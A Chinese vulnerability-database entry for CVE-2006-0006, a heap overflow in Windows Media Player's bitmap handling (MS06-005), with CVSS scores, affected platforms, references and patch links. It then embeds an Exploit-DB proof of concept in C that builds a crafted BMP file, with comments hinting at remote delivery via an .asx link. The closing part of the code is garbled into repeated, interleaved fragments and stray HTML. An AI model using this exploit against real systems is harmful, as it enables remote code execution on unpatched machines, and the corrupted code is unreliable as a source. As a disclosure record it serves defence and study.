CVE-2006-0006
CVSS9.3
发布时间 :2006-02-14 17:06:00
修订时间 :2017-07-10 21:33:20
NMCOES    

[原文]Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data.


[CNNVD]Microsoft Windows Media Player畸形位图文件处理堆溢出漏洞(CNNVD-200602-197)

        Microsoft Windows Media Player是一款非常流行的媒体播放器。
        Microsoft Windows Media Player在处理畸形的位图文件时存在漏洞,攻击者可能利用此漏洞在用户机器上执行任意指令。Windows Media Player可以播放位图格式文件(如.bmp文件)并解码bmp文件,但没有正确地处理声明大小为0的bmp文件。在这种情况下,WMP会分配大小为0的堆,但实际上会以实际文件长度拷贝数据到这个堆,因此声明大小为0的bmp文件会导致溢出。攻击者可以通过诱骗用户使用Windows Media Player打开特制的位图文件导致执行任意指令。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:windows_media_player:9Microsoft Windows Media Player 9
cpe:/o:microsoft:windows_2000::sp1Microsoft windows 2000_sp1
cpe:/a:microsoft:windows_media_player:10Microsoft Windows Media Player 10
cpe:/o:microsoft:windows_meMicrosoft Windows ME
cpe:/o:microsoft:windows_xp::sp1:tablet_pcMicrosoft windows xp_sp1 tablet_pc
cpe:/o:microsoft:windows_2000::sp4::fr
cpe:/o:microsoft:windows_98::goldMicrosoft windows 98_gold
cpe:/a:microsoft:windows_media_player:7.1Microsoft windows_media_player 7.1
cpe:/o:microsoft:windows_98seMicrosoft windows 98_se
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1661Windows Media Player 9 Bitmap Remote Code Execution
oval:org.mitre.oval:def:1578Windows Media Player 7.10 Bitmap Remote Code Execution
oval:org.mitre.oval:def:1256Windows Media Player 8 Bitmap Remote Code Execution
oval:gov.nist.fdcc.patch:def:11532MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
oval:gov.nist.USGCB.patch:def:11532MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0006
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0006
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-197
(官方数据源) CNNVD

- 其它链接及资源

http://securityreason.com/securityalert/423
(UNKNOWN)  SREASON  423
http://securitytracker.com/id?1015627
(PATCH)  SECTRACK  1015627
http://www.eeye.com/html/research/advisories/AD20060214.html
(VENDOR_ADVISORY)  MISC  http://www.eeye.com/html/research/advisories/AD20060214.html
http://www.kb.cert.org/vuls/id/291396
(VENDOR_ADVISORY)  CERT-VN  VU#291396
http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
(VENDOR_ADVISORY)  MS  MS06-005
http://www.securityfocus.com/archive/1/archive/1/424983/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060214 [EEYEB-20051017] Windows Media Player BMP Heap Overflow
http://www.securityfocus.com/archive/1/archive/1/425158/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060215 Windows Media Player BMP Heap Overflow (MS06-005)
http://www.securityfocus.com/bid/16633
(PATCH)  BID  16633
http://www.us-cert.gov/cas/techalerts/TA06-045A.html
(VENDOR_ADVISORY)  CERT  TA06-045A
http://www.vupen.com/english/advisories/2006/0574
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0574
https://exchange.xforce.ibmcloud.com/vulnerabilities/24488
(UNKNOWN)  XF  win-media-player-bmp-bo(24488)

- 漏洞信息

Microsoft Windows Media Player畸形位图文件处理堆溢出漏洞
高危 缓冲区溢出
2006-02-14 00:00:00 2006-10-30 00:00:00
远程  
        Microsoft Windows Media Player是一款非常流行的媒体播放器。
        Microsoft Windows Media Player在处理畸形的位图文件时存在漏洞,攻击者可能利用此漏洞在用户机器上执行任意指令。Windows Media Player可以播放位图格式文件(如.bmp文件)并解码bmp文件,但没有正确地处理声明大小为0的bmp文件。在这种情况下,WMP会分配大小为0的堆,但实际上会以实际文件长度拷贝数据到这个堆,因此声明大小为0的bmp文件会导致溢出。攻击者可以通过诱骗用户使用Windows Media Player打开特制的位图文件导致执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=26A0B9E1-1242-4E55-B3D4-8377B83257C6
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8F9EEF16-04F7-4DA8-A0EF-1797B52D0B4B
        http://www.microsoft.com/downloads/details.aspx?FamilyId=182735E1-9382-4F2E-A624-D2316A96B411

- 漏洞信息 (1500)

Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (EDBID:1500)
windows dos
2006-02-15 Verified
0 ATmaCA
N/A [点击下载]
/*
* For Remote Exploration (hint):
* http://www.spyinstructors.com/atmaca/research/wmp_remote_poc.asx
*/

/*
*
* Windows Media Player BMP Heap Overflow (MS06-005)
* Bug discovered by eEye - http://www.eeye.com/html/research/advisories/AD20060214.html
* Exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Systems Affected:
* Microsoft Windows Media Player 7.1 through 10
*
* Windows NT 4.0
* Windows 98 / ME
* Windows 2000 SP4
* Windows XP SP1 / SP2
* Windows 2003
*
*
*/

/*
*
* In this vulnerability,payload is loaded to different places in memory each time.
* but some time is very easy to call our shell code :
* http://www.spyinstructors.com/atmaca/research/wmp.JPG
* but some times not =) because of ,no shell this time
*
*/

/*
*
* Microsoft has released a patch for this vulnerability.
* The patch is available at:
* http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
*
*/

#include <windows.h>
#include <stdio.h>

#define BITMAP_FILE_SIZE        0xA8D2
#define BITMAP_FILE_NAME        "crafted.bmp"

#pragma pack( push )
#pragma pack( 1 )

// bitmap file format - http://atlc.sourceforge.net/bmp.html
//File information header provides general information about the file
typedef struct _BitmapFileHeader {
  WORD    bfType;
  DWORD   bfSize;
  WORD    bfReserved1;
  WORD    bfReserved2;
  DWORD   bfOffBits;
} BMPFHEADER;

//Bitmap information header provides information specific to the image data
typedef struct _BitmapInfoHeader{
  DWORD  biSize;
  LONG   biWidth;
  LONG   biHeight;
  WORD   biPlanes;
  WORD   biBitCount;
  DWORD  biCompression;
  DWORD  biSizeImage;
  LONG   biXPelsPerMeter;
  LONG   biYPelsPerMeter;
  DWORD  biClrUsed;
  DWORD  biClrImportant;
} BMPIHEADER;

#pragma pack( pop )

int main(void)
{
        FILE *File;
        BMPFHEADER *bmp_fheader;
        BMPIHEADER *bmp_iheader;
        char *pszBuffer;

        printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
        printf("\nBug discovered by eEye");
        printf("\nExploit coded by ATmaCA");
        printf("\nWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");


        if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) {
                printf("\n [E:] fopen()");
                exit(1);
        }

        bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER));
        bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER));
        pszBuffer = (char*)malloc(BITMAP_FILE_SIZE);

        memset(pszBuffer,0x41,BITMAP_FILE_SIZE);

        bmp_fheader->bfType = 0x4D42; // "BM"
        bmp_fheader->bfSize = BITMAP_FILE_SIZE;
        bmp_fheader->bfReserved1 = 0x00;
        bmp_fheader->bfReserved2 = 0x00;

        // eEye - MAGIC
        // Antiviruses will get the signature from here!!!
        bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );

        bmp_i00; //( size= 0x1 =dnwmpBMPFPFPFeof/ndPIH- 
*/n*
*EADE    1      ));
 rot; der->bfOffBits = 0x00; //(der{
  DWOR4D42; // "BM&quohere!!!
        bm   bi4D42;A89C/ "BM&quohere!!!
         biHeight;
4D42; // "BM&quohere!!!
      Y  biHeight;
4D42; // "BM&quohere!!!
      
  DWOR4D42; // "BM&quohere!!!
      
  ;
  DWORD>bfSize = BITMAheacpy=(BMPIHEADEReserved2 =,ntf("\n [E:] fopen()&quoheacpy=(BMPIHEAD+ntf("\n [E:] ,&quohere!!!,      }

        bmp_pen()&quofw ree=(BMPIHEADEITMAP_FILE_SIZE);-1, 1,ntf(fopen()&quofw ree=an"bfSan&quo, 1,1, ntf(foe -Termi;
 or_pen()&quofclose(ntf(fopen()&quo to Kozan"\ft.com& mspx
*
*/

#inclut.com& ors.been    -->d title="as 2000 direuot;y.\ft.com"en()&quore   n /nd}     milw0rm;
   [="20%">